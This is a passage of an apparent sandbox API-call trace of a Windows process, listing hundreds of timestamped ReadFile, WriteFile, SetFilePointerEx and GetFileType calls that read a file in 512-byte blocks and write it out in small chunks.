_get_osfhandle (_FileHandle=1) returned 0x4c [0092.925] WriteFile (in: hFile=0x4c, 
lpBuffer=0x16f4cc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f4cc*, lpNumberOfBytesWritten=0x16e4d0*=0x20, lpOverlapped=0x0) returned 1 [0092.925] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.925] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.925] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.925] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.926] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.926] GetFileType (hFile=0x4c) returned 0x1 [0092.926] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.926] GetFileType (hFile=0x4c) returned 0x1 [0092.926] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.926] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.926] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.926] GetFileType (hFile=0x4c) returned 0x1 [0092.926] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.926] WriteFile (in: hFile=0x4c, lpBuffer=0x16f33c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f33c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.926] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.926] GetFileType (hFile=0x4c) returned 0x1 [0092.926] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.926] WriteFile (in: hFile=0x4c, lpBuffer=0x16f38c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f38c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.926] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0092.926] GetFileType (hFile=0x4c) returned 0x1 [0092.926] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.926] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f3dc*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.926] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.926] GetFileType (hFile=0x4c) returned 0x1 [0092.926] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.926] WriteFile (in: hFile=0x4c, lpBuffer=0x16f42c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f42c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.926] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.926] GetFileType (hFile=0x4c) returned 0x1 [0092.926] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.926] WriteFile (in: hFile=0x4c, lpBuffer=0x16f47c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f47c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.926] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.926] GetFileType (hFile=0x4c) returned 0x1 [0092.926] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.926] WriteFile (in: hFile=0x4c, lpBuffer=0x16f4cc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f4cc*, lpNumberOfBytesWritten=0x16e4d0*=0x20, lpOverlapped=0x0) returned 1 [0092.926] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.926] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.926] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.927] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, 
lpOverlapped=0x0) returned 1 [0092.927] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.927] GetFileType (hFile=0x4c) returned 0x1 [0092.927] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.927] GetFileType (hFile=0x4c) returned 0x1 [0092.927] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.927] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.927] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.927] GetFileType (hFile=0x4c) returned 0x1 [0092.927] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.927] WriteFile (in: hFile=0x4c, lpBuffer=0x16f33c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f33c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.927] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.927] GetFileType (hFile=0x4c) returned 0x1 [0092.927] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.927] WriteFile (in: hFile=0x4c, lpBuffer=0x16f38c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f38c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.927] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.927] GetFileType (hFile=0x4c) returned 0x1 [0092.927] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.927] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f3dc*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.927] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.927] GetFileType (hFile=0x4c) returned 0x1 [0092.927] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.927] WriteFile (in: hFile=0x4c, lpBuffer=0x16f42c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 
| out: lpBuffer=0x16f42c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.927] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.927] GetFileType (hFile=0x4c) returned 0x1 [0092.927] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.927] WriteFile (in: hFile=0x4c, lpBuffer=0x16f47c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f47c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.927] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.927] GetFileType (hFile=0x4c) returned 0x1 [0092.927] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.927] WriteFile (in: hFile=0x4c, lpBuffer=0x16f4cc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f4cc*, lpNumberOfBytesWritten=0x16e4d0*=0x20, lpOverlapped=0x0) returned 1 [0092.927] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.927] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.927] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.927] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.928] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.928] GetFileType (hFile=0x4c) returned 0x1 [0092.928] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.928] GetFileType (hFile=0x4c) returned 0x1 [0092.928] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.928] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.928] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.928] GetFileType (hFile=0x4c) returned 0x1 [0092.928] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0092.928] WriteFile (in: hFile=0x4c, lpBuffer=0x16f33c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f33c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.928] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.928] GetFileType (hFile=0x4c) returned 0x1 [0092.928] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.928] WriteFile (in: hFile=0x4c, lpBuffer=0x16f38c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f38c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.928] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.928] GetFileType (hFile=0x4c) returned 0x1 [0092.928] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.928] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f3dc*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.928] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.928] GetFileType (hFile=0x4c) returned 0x1 [0092.928] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.928] WriteFile (in: hFile=0x4c, lpBuffer=0x16f42c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f42c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.928] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.928] GetFileType (hFile=0x4c) returned 0x1 [0092.928] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.928] WriteFile (in: hFile=0x4c, lpBuffer=0x16f47c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f47c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.928] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.928] GetFileType (hFile=0x4c) returned 0x1 [0092.928] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0092.928] WriteFile (in: hFile=0x4c, lpBuffer=0x16f4cc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f4cc*, lpNumberOfBytesWritten=0x16e4d0*=0x20, lpOverlapped=0x0) returned 1 [0092.928] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.928] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.928] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.928] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.928] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.929] GetFileType (hFile=0x4c) returned 0x1 [0092.929] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.929] GetFileType (hFile=0x4c) returned 0x1 [0092.929] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.929] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.929] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.929] GetFileType (hFile=0x4c) returned 0x1 [0092.929] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.929] WriteFile (in: hFile=0x4c, lpBuffer=0x16f33c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f33c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.929] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.929] GetFileType (hFile=0x4c) returned 0x1 [0092.929] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.929] WriteFile (in: hFile=0x4c, lpBuffer=0x16f38c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f38c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 
[0092.929] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.929] GetFileType (hFile=0x4c) returned 0x1 [0092.929] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.929] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f3dc*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.929] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.929] GetFileType (hFile=0x4c) returned 0x1 [0092.929] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.929] WriteFile (in: hFile=0x4c, lpBuffer=0x16f42c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f42c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.929] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.929] GetFileType (hFile=0x4c) returned 0x1 [0092.929] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.929] WriteFile (in: hFile=0x4c, lpBuffer=0x16f47c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f47c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.929] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.929] GetFileType (hFile=0x4c) returned 0x1 [0092.929] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.929] WriteFile (in: hFile=0x4c, lpBuffer=0x16f4cc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f4cc*, lpNumberOfBytesWritten=0x16e4d0*=0x20, lpOverlapped=0x0) returned 1 [0092.929] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.929] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.929] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.929] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, 
lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.929] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.929] GetFileType (hFile=0x4c) returned 0x1 [0092.929] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.930] GetFileType (hFile=0x4c) returned 0x1 [0092.930] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.930] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.930] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.930] GetFileType (hFile=0x4c) returned 0x1 [0092.930] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.930] WriteFile (in: hFile=0x4c, lpBuffer=0x16f33c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f33c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.930] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.930] GetFileType (hFile=0x4c) returned 0x1 [0092.930] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.930] WriteFile (in: hFile=0x4c, lpBuffer=0x16f38c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f38c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.930] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.930] GetFileType (hFile=0x4c) returned 0x1 [0092.930] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.930] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f3dc*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.930] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.930] GetFileType (hFile=0x4c) returned 0x1 [0092.930] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.930] WriteFile (in: hFile=0x4c, lpBuffer=0x16f42c*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f42c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.930] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.930] GetFileType (hFile=0x4c) returned 0x1 [0092.930] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.930] WriteFile (in: hFile=0x4c, lpBuffer=0x16f47c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f47c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.930] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.930] GetFileType (hFile=0x4c) returned 0x1 [0092.930] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.930] WriteFile (in: hFile=0x4c, lpBuffer=0x16f4cc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f4cc*, lpNumberOfBytesWritten=0x16e4d0*=0x20, lpOverlapped=0x0) returned 1 [0092.930] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.930] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.930] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.930] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.930] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.930] GetFileType (hFile=0x4c) returned 0x1 [0092.931] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.931] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.931] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.931] SetFilePointerEx (in: hFile=0x54, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.931] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.931] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.931] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.931] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.931] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.931] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.931] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.931] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.931] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.931] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.931] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.931] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.931] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.931] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, 
lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.931] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.931] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.931] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.931] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.932] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.932] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.932] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.932] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.932] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.932] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.932] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.932] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.932] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.932] 
_get_osfhandle (_FileHandle=4) returned 0x54 [0092.932] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.932] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.932] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.932] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.932] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.932] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.932] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.932] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.932] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.932] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.932] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.932] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.932] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 
